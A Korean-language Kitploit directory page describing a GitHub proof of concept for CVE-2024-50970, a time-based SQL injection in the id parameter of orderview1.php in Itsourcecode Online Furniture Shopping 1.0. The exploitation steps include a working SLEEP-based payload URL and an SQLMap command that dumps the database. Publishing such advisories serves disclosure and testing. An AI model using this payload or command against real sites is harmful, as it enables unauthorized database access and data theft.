Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-50970 — Itsourcecode Online Furniture Shopping Project 1.0의 orderview1.php에 있는 id 매개변수를 통한 시간 기반 SQL 주입을 시연하는 개념 증명으로, 악용 단계와 SQLMap 명령을 포함합니다. | Kitploit
도구/GitHubGitHub/akhlak2511/cve-2024-50970
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationDatabase Security
GitHubakhlak2511/cve-2024-50970

CVE-2024-50970

Itsourcecode Online Furniture Shopping Project 1.0의 orderview1.php에 있는 id 매개변수를 통한 시간 기반 SQL 주입을 시연하는 개념 증명으로, 악용 단계와 SQLMap 명령을 포함합니다.

저장소 보기
171년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-50970

설명

Itsourcecode Online Furniture Shopping Project 1.0의 orderview1.php에서 발견된 SQL 인젝션 취약점으로, 원격 공격자가 id 파라미터를 통해 임의의 SQL 명령을 실행할 수 있습니다.

취약점 유형

SQL 인젝션

제품 공급업체

Itsourcecode

영향을 받는 제품 코드 베이스:

https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0

영향을 받는 구성 요소:

Itsourcecode Online Furniture Shopping v1.0은 orderview1.php 페이지의 id 파라미터를 통해 SQL 인젝션에 취약합니다.

공격 벡터:

  1. 로컬에서 애플리케이션을 설정하고, 계정을 등록한 후 새로 등록한 계정으로 로그인합니다.
  2. 브라우저에서 다음 URL로 이동합니다: http://localhost/nikos/orderview1.php?action=edit&id=1728835149
  3. SQL 페이로드 삽입: URL의 id 파라미터를 시간 기반 SQL 인젝션 페이로드를 포함하도록 수정합니다. http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
  4. 애플리케이션 응답 확인: 인젝션이 성공하면 페이지 로딩 시간이 눈에 띄게 길어져야 하며(10초), 이는 id 파라미터가 SQL 인젝션에 취약함을 확인합니다.
  5. 이제 SQLMap 도구를 사용하여 추가적인 악용 및 데이터베이스 덤프를 위해 아래 명령어를 실행합니다: python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast

참고 자료:

  1. https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
  2. https://owasp.org/www-community/attacks/SQL_Injection
도구 다운로드